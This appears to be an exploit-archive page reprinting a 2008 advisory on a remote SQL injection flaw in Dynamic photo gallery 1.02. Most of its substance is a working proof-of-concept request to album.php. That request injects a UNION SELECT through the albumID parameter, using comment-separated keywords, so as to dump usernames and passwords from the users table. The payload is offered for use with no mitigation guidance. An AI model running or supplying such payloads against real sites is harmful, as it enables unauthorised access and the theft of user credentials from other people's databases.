Dynamic photo gallery 1.02 (albumID) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Dynamic photo gallery 1.02 (albumID) Remote SQL Injection Vulnerability
# Published : 2008-03-01
# Author : Aria-Security Team
# Previous Title : phpComasy 0.8 (mod_project_id) Remote SQL Injection Vulnerability
# Next Title : Koobi CMS 4.3.0 - 4.2.3 (categ) Remote SQL Injection Vulnerability

Aria-Security Team
http://Aria-Security.Net
----------------------------
Shoutz: Aura, imm02rtal, NULL, Kinglet And all our staff
Vendor: http://www.phpwebscript.net/dynamicphotogallery/foto-gallery.php
Original Link: http://forum.aria-security.net/showthread.php?p=1521

PoC:
album.php?slideshow=start&albumID=-4214/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/users


Regards
The-0utl4w 

# www.Syue.com [2008-03-01]